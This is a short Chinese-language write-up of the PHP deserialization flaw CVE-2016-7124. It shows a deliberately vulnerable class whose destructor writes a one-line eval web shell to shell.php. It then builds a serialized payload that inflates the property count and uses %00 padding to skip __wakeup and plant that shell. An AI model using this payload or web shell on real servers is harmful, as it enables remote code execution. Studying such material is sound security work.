PHP魔术方法反序列化(CVE-2016-7124)
PHP魔术方法反序列化
PHP5小于5.6.25或PHP7小于7.0.10
_wakeup
在对象被反序列化后被调用
源码分析
<?php
// 目标:反序列化的时候绕过__wakeup以达到写文件的操作
// CVE-2016-7124
// PHP5小于5.6.25或PHP7小于7.0.10
class Test
{
// 私有成员变量
private $poc = '';
public function __construct($poc)
{
$this->poc = $poc;
}
function __destruct()
{
if ($this->poc != '')
{
file_put_contents('shell.php', '<?php eval($_POST["shell"]);?>');
die('Success!!!');
}
else
{
die('fail to getshell!!!');
}
}
function __wakeup()
{
// 返回由对象属性组成的关联数组,把所有的属性置空
foreach(get_object_vars($this) as $k => $v)
{
$this->$k = null;
}
echo "waking up...n";
}
}
$poc = $_GET['poc'];
/*if(!isset($poc))
{
show_source(__FILE__);
die();
}*/
print_r("your payload:".$poc);
$a = unserialize($poc);
// PHP5小于5.6.25或PHP7小于7.0.10
当成员变量的数量大于本身的成员变量的数量,就会跳过_wakeup魔术方法
当销毁的时触发一个生成一句话木马文件的析构函数
满足的条件是这个类的poc成员变量不为空
但是里面的_wakeup函数将所传的成员变量的值置空
反序列化成员变量
所以现在需要绕过这个_wakeup函数执行
php-poc
我们先序列化一下该成员变量
当成员变量的数量大于本身的成员变量的数量,就会跳过_wakeup魔术方法
所以增加一个成员变量或多个成员变量
O:4:“Test”:2:{s:9:" Testpoc";s:5:“shell”;}
但是要注意的是该poc成员变量是一个私有变量,序列化后与类名进行拼接了
所以可以通过url编码空格%00进行隔开
O:4:“Test”:2:{s:9:"%00Test%00poc";s:5:“shell”;}